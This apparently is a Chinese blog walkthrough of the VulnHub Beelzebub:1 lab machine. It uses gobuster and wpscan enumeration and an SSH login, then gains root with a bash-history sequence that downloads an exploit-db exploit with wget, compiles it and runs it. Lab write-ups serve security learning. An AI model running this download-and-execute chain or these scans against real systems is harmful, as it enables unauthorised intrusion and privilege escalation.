vlnhub之Beelzebub :1

0X001 简介

我们在下载靶机时会有这样的提示:您必须尽可能多地枚举并且不要忘记 Base64。说明我们要使用base64,他主要是对Beelzebub进行base64编码,然后可以访问到新的页面,下面是我的一系列操作。

0X002 渗透过程

首先我进行IP扫码,获取靶机的ip地址

我们查看这个ip的端口开启了哪些服务

 发现他是使用的apache 2.4.29进行搭建的,于是我打开这个网页

 我们看一看他有没有子目录

gobuster dir -r -u http://192.168.181.169/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak

 于是我在/index.php页面的源码页面给我们了一些提示

 于是对其进行mds编码

echo -n beelzebub | md5sum

 

 于是打开网页进行查看

发现他进行了页面的跳转, 那我想他会不会在这个页面下有一些子目录呢,于是进行目录扫描

gobuster dir -r -u http://192.168.181.169/d6bf00c767d95fcd6bc40fad7ead64cc --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -x php,html,txt

 

 什么也没有,于是我想到了wordpress CMS了解他到WP-CMS – WordPress 插件 | WordPress.org China 简体中文

进行查看,于是我使用wpscan进行查看

wpscan --url http://192.168.181.169/d18e1e22becbd915b45e0e655429d487/ -e --plugins-detection aggressive --ignore-main-redirect --force --api-token xxxxxxxxx

 我发现了两个用户

 还有三个子目录

 在查看的工程中,发现只有/wp-content/uploads/可以访问

 发现他还有一个目录可以查看/Talk To VALAK

 于是发现了登录的密码

 于是进行ssh登录

 登录成功于是进行提权

首先我们当然是查看历史记录了

cat .bash_history

wget https://www.exploit-db.com/download/47009

mv 47009 ./exploit.c

gcc exploit.c -o exploit

./exploit

 于是获得root权限

获得最终的flag

 

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值